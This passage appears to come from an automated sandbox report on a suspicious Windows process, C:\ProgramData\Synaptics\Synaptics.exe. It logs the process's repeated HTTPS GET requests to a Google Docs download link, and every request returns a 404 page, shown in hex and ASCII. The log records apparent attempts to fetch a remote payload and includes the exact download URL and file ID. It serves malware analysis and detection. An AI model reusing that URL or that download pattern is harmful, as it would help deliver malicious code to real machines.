                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC846INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 35 35 6d 4c 64 71 37 76 49 50 4f 38 30 6c 46 44 50 75 44 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="155mLdq7vIPO80lFDPuDtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:06 UTC847INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:06 UTC848INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        279192.168.2.350067142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC844OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC848INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-F+6k4TRLT8BEATbJgxtGaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC849INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 4e 49 57 47 52 39 75 68 72 73 49 42 4e 52 68 68 50 46 2f 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LNIWGR9uhrsIBNRhhPF/gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:06 UTC851INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:06 UTC851INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        28192.168.2.349767142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC84OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC84INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yYYadACdjx+K1AyZdc9Dow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC85INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:32 UTC85INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 2b 34 54 64 75 54 48 47 38 34 61 4b 42 4a 32 37 48 44 2f 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C+4TduTHG84aKBJ27HD/7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:32 UTC87INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:32 UTC87INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        280192.168.2.350068142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC848OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC851INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4cIyGwT/r9Ihuin+ycFoxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC852INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:06 UTC852INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 59 4a 37 59 38 56 44 6f 71 79 38 64 6e 41 44 62 56 55 51 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bYJ7Y8VDoqy8dnADbVUQ1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:06 UTC853INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:06 UTC854INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        281192.168.2.350069142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC851OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC854INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VGHoWNTpIvAJEv7izt47GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC855INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:06 UTC855INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 33 30 49 41 30 50 42 4a 47 73 54 2f 36 35 73 4b 69 5a 51 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f30IA0PBJGsT/65sKiZQyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:06 UTC856INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:06 UTC857INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        282192.168.2.350070142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC854OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC857INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OpAjeeIkALq3J6GMdYpFtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
